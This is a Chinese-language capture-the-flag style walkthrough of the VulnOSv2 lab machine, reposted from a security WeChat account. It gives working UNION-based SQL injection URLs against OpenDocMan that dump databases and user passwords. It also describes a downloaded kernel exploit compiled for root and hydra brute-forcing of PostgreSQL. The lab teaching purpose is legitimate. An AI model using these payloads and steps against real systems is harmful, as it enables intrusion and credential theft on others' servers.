VulnOSv2详细教学

admin 2025年3月5日14:12:50评论12 views字数 1972阅读6分34秒阅读模式
VulnOSv2详细教学

“别走远了”

——以上内容由DeepSeek R1模型输出

arp发现靶机ip地址VulnOSv2详细教学发现开放80端口那先去访问一下VulnOSv2详细教学问题不大,没有什么有用的提示那就上dirb跑一下VulnOSv2详细教学VulnOSv2详细教学这里给了一个版本号VulnOSv2详细教学通过searchsploit搜索了一下没有这个版本的poc/exp去网上搜搜看VulnOSv2详细教学这个也试了一下也利用不了回到页面上发现有个website可以点VulnOSv2详细教学然后我们会来到一个新的网站VulnOSv2详细教学最终在每个页面都看了一下,发现这个页面的鼠标放上去鼠标会变,这里也是给了账号密码VulnOSv2详细教学通过提示我们用给的用户名和密码去访问一下VulnOSv2详细教学来到这个地方我们发现一个大大的logo就是这个opendocman,还是老样子去searchsploit搜索一下刚好有一个符合的VulnOSv2详细教学拿到当前目录下好好看看VulnOSv2详细教学这个意思是有两个漏洞可以用一个sql注入一个权限提升的VulnOSv2详细教学

尝试利用http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9
VulnOSv2详细教学
爆破库名192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user  UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata
VulnOSv2详细教学
爆表http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()
VulnOSv2详细教学
字段192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()
VulnOSv2详细教学
查表http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x6f646d5f75736572佬说这里有一个注意点,就是用字符串表名来查表的时候查不出来,需要把表的字符串换成16进制0x6f646d5f75736572
VulnOSv2详细教学
查密码http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(username,password),3,4,5,6,7,8,9 from odm_user

VulnOSv2详细教学VulnOSv2详细教学给了两个密码咱们都试试VulnOSv2详细教学ssh直接连VulnOSv2详细教学进来先用python获取一个交互式shell,可以看到内核是一个低版本的去search一下VulnOSv2详细教学有两个符合先试试.cVulnOSv2详细教学将.c文件wget到tmp目录下,看看.c怎么执行的,编译后./ofs执行提权脚本,成功获取权限VulnOSv2详细教学

第二种方式 解压目录下的文件夹,hydraVulnOSv2详细教学./confingure好了之后告诉我们makeVulnOSv2详细教学安装成功VulnOSv2详细教学ps -aux时发现postgres进行信息,还有hydra尝试进行一下爆破VulnOSv2详细教学来到usr/share/wordlists/metasploit目录下面有postgres的默认密码和用户的密码本这样结合hydra爆破一下VulnOSv2详细教学./hydra -L user.txt -P passwd.txt localhost postgresVulnOSv2详细教学登录postgres psql -h localhost -U postgresVulnOSv2详细教学查看databaseVulnOSv2详细教学c 进入到这个systemVulnOSv2详细教学VulnOSv2详细教学SLECT * FROM users;VulnOSv2详细教学su切换到vulnosadmin 查看有一个r00t.blend 通过cp挂在html目录下VulnOSv2详细教学wget下载r00t.blendVulnOSv2详细教学来到这个https://imagetostl.com/cn/view-blend-online网站下点击上传就可以看到,然后用密码登录root即可ab12fg//drgVulnOSv2详细教学

原文始发于微信公众号(泷羽Sec-云起):VulnOSv2详细教学

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月5日14:12:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnOSv2详细教学https://cn-sec.com/archives/3798876.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息